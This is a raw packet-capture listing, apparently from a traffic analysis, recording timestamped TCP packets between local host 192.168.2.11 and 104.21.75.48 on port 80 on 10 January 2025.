Jan 10, 2025 19:12:30.445297956 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445321083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445333004 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445343018 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445348978 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445365906 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445383072 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445384026 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445384026 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445394993 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445406914 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445408106 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445421934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445422888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445432901 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445442915 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445457935 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445457935 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445467949 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445480108 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445489883 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445501089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445507050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445507050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445513010 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445527077 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445533037 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445538998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445550919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445561886 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445564985 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445564985 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445574045 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445588112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445599079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445611000 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445612907 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445612907 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445622921 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445633888 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445646048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445647001 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445658922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445663929 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445673943 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445684910 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.445686102 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.445713043 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446017027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446028948 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446041107 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446053028 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446063995 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446064949 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446074963 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446086884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446094990 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446094990 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446096897 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446109056 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446130991 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446134090 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446146011 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446157932 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446168900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446168900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446172953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446185112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446196079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446207047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446214914 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446214914 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446222067 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446235895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446260929 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446260929 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446386099 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446460009 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446477890 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446489096 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446501017 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446505070 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446511984 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446523905 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446537971 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446543932 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.446551085 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446551085 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446589947 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.446589947 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.515155077 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515176058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515197039 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515208960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515219927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515244007 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515247107 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.515258074 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515269995 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515300035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515307903 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.515321016 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515330076 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.515335083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515353918 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.515388012 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515388012 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.515402079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515415907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.515436888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.515458107 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516486883 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516505957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516520977 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516532898 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516545057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516556978 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516575098 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516582966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516603947 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516603947 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516618013 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516633987 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516638994 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516645908 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516657114 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516663074 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516674042 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516686916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516686916 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516686916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516699076 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516724110 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516777992 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516843081 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516854048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516864061 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516877890 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516896009 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516900063 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516900063 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516908884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516918898 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516927958 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516931057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516947031 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516968966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516968966 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516968966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516979933 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.516988993 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.516989946 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517009020 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517019033 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517019033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517031908 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517045021 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517055988 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517055988 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517092943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517092943 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517103910 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517113924 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517126083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517138004 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517149925 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517151117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517151117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517162085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517184019 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517249107 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517252922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517266035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517277956 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517292023 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517297983 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517299891 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517308950 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517322063 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517333031 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517349005 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517373085 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517482996 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517493963 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517513990 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517520905 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517527103 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517537117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517549992 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517560959 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517575979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.517576933 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517576933 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517622948 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.517622948 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.522594929 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.524715900 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.524748087 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.524760962 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.524769068 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.524772882 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.524785995 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.524806976 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.524807930 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.524842024 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.524986982 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.524998903 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525011063 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525023937 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525028944 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525034904 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525046110 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525058031 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525068998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525084972 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525103092 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525109053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525109053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525113106 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525124073 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525142908 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525152922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525166035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525166988 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525166988 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525177956 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525191069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525201082 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525216103 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525216103 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525234938 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525341988 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525759935 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525773048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525790930 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525803089 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525805950 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525844097 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525856018 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525857925 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525888920 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525911093 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525921106 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525921106 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525933981 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525949955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525971889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525979996 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.525985003 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.525996923 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526010990 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526015997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526015997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526022911 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526037931 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526073933 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526102066 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526113987 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526124954 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526160955 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526160955 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526182890 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526202917 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526213884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526247978 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526263952 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526304007 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526316881 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526335955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526349068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526359081 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526361942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526375055 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526381016 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526391029 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526405096 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526407003 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526417017 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.526436090 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526453972 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.526475906 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.604149103 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604178905 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604192019 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604212046 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.604226112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604238987 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604243040 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.604253054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604301929 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.604301929 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.604324102 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604337931 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604348898 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604393005 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.604393005 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.604409933 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604424953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604448080 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604460001 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604470968 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.604473114 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604522943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.604522943 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.604928970 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604968071 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.604980946 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605017900 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605022907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605036974 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605037928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605051041 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605108023 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605108023 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605134964 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605146885 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605159044 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605171919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605199099 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605206966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605211973 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605233908 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605233908 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605257034 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605259895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605273008 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605303049 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605315924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605315924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605353117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605385065 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605396986 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605437994 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605482101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605510950 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605525017 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605534077 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:30.605537891 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605550051 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:30.605561972 CET	49726	80	192.168.2.11	104.21.75.48
